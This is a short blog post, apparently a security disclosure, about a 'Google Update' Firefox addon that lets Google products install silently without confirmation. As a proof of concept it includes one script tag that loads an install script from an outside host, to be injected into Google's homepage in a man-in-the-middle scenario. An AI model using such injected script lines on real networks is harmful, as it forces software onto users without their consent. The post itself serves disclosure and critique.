Google Update

If you have installed Google Chrome, or maybe Google Desktop or Google’s toolbar, you might be surprised that you have a new Firefox addon, named “Google Update”. And just like Microsoft’s loveable addon, the Google Update addon opens a hole you probably don’t want opened.

Unable to find much documentation on the addon, I did a little investigating myself. The addon allows installation of Google products without any normal confirmation dialogs, such as Google Chrome.

This is a bad idea. For example, in a wireless or MITM scenario, you could drop the following in the head of the google homepage and the latest version of Chrome would be forcibly installed on the system: (I adapted the code from the code on the page here: http://www.google.com/chrome/eula.html that installs Chrome)

<script type=”text/javascript” src=”http://scriptjunkie1.110mb.com/security/installChrome.js&#8221; />

The Gmail voice and video chat and presumably many other Google apps can also be forcibly installed. Chrome’s forced auto-updating can be annoying and hated when Chrome is running, so why exactly does Google silently add this to my non-Google browsers?

Advertisements

, , ,

  1. Leave a comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: